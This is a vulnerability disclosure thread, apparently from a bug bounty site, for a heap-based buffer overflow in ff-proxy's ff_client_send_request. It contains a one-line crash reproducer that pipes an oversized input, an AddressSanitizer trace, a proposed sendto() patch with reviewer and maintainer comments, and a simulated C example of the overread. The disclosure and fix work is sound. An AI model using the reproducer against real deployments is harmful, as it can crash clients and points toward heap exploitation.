Heap-based Buffer Overflow in timetoogo/ff-proxy

Valid

Reported on

Oct 10th 2021


Description

Heap-based buffer overflow in ff_client_send_request. It can be triggered when the input buffer is larger than FF_CLIENT_MAX_PACKET_LENGTH.

Proof of Concept

z3phyr@ubuntu:~/ff-proxy$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.3 LTS
Release:  20.04
Codename:   focal

z3phyrp@ubuntu:~/ff-proxy$ python3 -c 'print("A" * 1300)' | ./build/client --port 8081
[2021-10-10 12:12:07] DEBUG Initialising OpenSSL
[2021-10-10 12:12:07] DEBUG Initialised OpenSSL
[2021-10-10 12:12:07] DEBUG Read 1301 bytes from STDIN
[2021-10-10 12:12:07] DEBUG Packetised payload into 2 packets
[2021-10-10 12:12:07] DEBUG Creating socket
[2021-10-10 12:12:07] INFO Sending request to 127.0.0.1:8081
[2021-10-10 12:12:07] INFO test: 2
[2021-10-10 12:12:07] INFO test: 2
=================================================================
==51443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a000001794 at pc 0x7ffff7619985 bp 0x7fffffffdd40 sp 0x7fffffffd4e8
READ of size 61 at 0x61a000001794 thread T0
    #0 0x7ffff7619984  (/lib/x86_64-linux-gnu/libasan.so.5+0x98984)
    #1 0x55555555d58a in ff_client_send_request client/c/client.c:345
    #2 0x55555555abbc in ff_client_make_request client/c/client.c:56
    #3 0x55555555d925 in main client/c/main.c:21
    #4 0x7ffff704d0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #5 0x55555555892d in _start (/home/giridharp/ff-proxy/build/client+0x492d)

0x61a000001794 is located 0 bytes to the right of 1300-byte region [0x61a000001280,0x61a000001794)
allocated by thread T0 here:
    #0 0x7ffff768edc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6)
    #1 0x55555555beb7 in ff_client_packetise_request client/c/client.c:200
    #2 0x55555555ab63 in ff_client_make_request client/c/client.c:54
    #3 0x55555555d925 in main client/c/main.c:21
    #4 0x7ffff704d0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)


Impact

This corrupts other packets that are yet to be sent, and hence abusing the heap metadata can cause arbitrary code execution. Will create a PoC if possible.
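The arithmetic behind the overread, as an added example that is not ff-proxy's code: the packet struct, the loop shape and the stand-in sendto() are assumptions, and the fixed path follows the maintainer's later reasoning in this thread that partial sends do not apply to UDP. The stand-in never reads memory; it only counts how many bytes of each requested range fall outside the packet buffer.

```c
#include <stddef.h>
#include <stdint.h>

/* Packet as handed to sendto() (assumed shape, not the project's own struct). */
struct ff_packet {
    uint8_t *value;
    size_t length;
};

/* Stand-in for sendto(): touches no memory. It adds to *overread the number of
 * bytes in [buf, buf+len) that lie past the end of p's buffer and reports at
 * most max_chunk bytes as sent, so a partial-send loop keeps iterating. */
static size_t fake_sendto(const struct ff_packet *p, const uint8_t *buf,
                          size_t len, size_t max_chunk, size_t *overread)
{
    size_t start = (size_t)(buf - p->value);
    if (start + len > p->length)
        *overread += start + len - p->length;
    return len < max_chunk ? len : max_chunk;
}

/* Loop shaped like the report's '-' line (the loop itself is an assumption):
 * the pointer advances by sent_length while the length stays packets[i].length.
 * Returns the total out-of-bounds bytes the kernel would be asked to read. */
size_t send_vulnerable(const struct ff_packet *p, size_t max_chunk)
{
    size_t overread = 0, sent_length = 0;
    while (sent_length < p->length) {
        size_t chunk = fake_sendto(p, p->value + sent_length, p->length,
                                   max_chunk, &overread);
        if (chunk == 0)
            break;
        sent_length += chunk;
    }
    return overread;
}

/* Fixed form following the maintainer's reasoning in the thread: a UDP datagram
 * goes out whole or not at all, so send once from the buffer start and treat a
 * short return as an error rather than retrying. Returns 0 on success. */
int send_fixed(const struct ff_packet *p, size_t max_chunk)
{
    size_t overread = 0;
    size_t chunk = fake_sendto(p, p->value, p->length, max_chunk, &overread);
    return (chunk == p->length && overread == 0) ? 0 : -1;
}

/* Constructed 1300-byte packet, the region size in the ASan report above. */
static uint8_t pkt_buf[1300];
const struct ff_packet pkt = { pkt_buf, sizeof pkt_buf };
```

With a 1300-byte packet and a stand-in that completes 500 bytes per call, the vulnerable loop asks for 500 and then 1000 bytes past the end of the buffer before it terminates, while the fixed path reports a short send as an error.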

Occurrences

Will send this potential patch if the maintainer approves :)

-            chunk_length = sendto(sockfd, packets[i].value + sent_length, packets[i].length, 0, res->ai_addr, res->ai_addrlen);
+            chunk_length = sendto(sockfd, packets[i].value, packets[i].length, 0, res->ai_addr, res->ai_addrlen);
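Review bot: Dropping `+ sent_length` on the `+` line removes the overread, since the `-` line asks sendto() to read `packets[i].length` bytes starting `sent_length` bytes into the packet, which extends `sent_length` bytes past the buffer whenever the offset is non-zero. The hunk carries no context, so it is not visible whether `sent_length` is still accumulated by a surrounding loop; if it is, that loop now resends the same full datagram on every iteration, so either the loop should go (UDP datagrams are all-or-nothing, as the maintainer concludes below) or the return value should be compared against `packets[i].length` and a short or failed send treated as an error. A regression test that feeds a payload longer than FF_CLIENT_MAX_PACKET_LENGTH through the client under ASan, as in the PoC, would pin the fix.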
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
z3phyr
2 months ago

Researcher


Hi huntr.dev team, is there any update?

We have contacted a member of the timetoogo/ff-proxy team and are waiting to hear back a month ago
timetoogo validated this vulnerability a month ago
z3phyr has been awarded the disclosure bounty
The fix bounty is now up for grabs
timetoogo
a month ago

Maintainer


Patch doesn’t look quite right. Still need to take partial sends into account.

timetoogo
a month ago

Maintainer


Ignore the last comment; partial sends are not required for UDP. Will be submitting a patch soon.

timetoogo confirmed that a fix has been merged on 50566a a month ago
The fix bounty has been dropped
client.c#L345 has been validated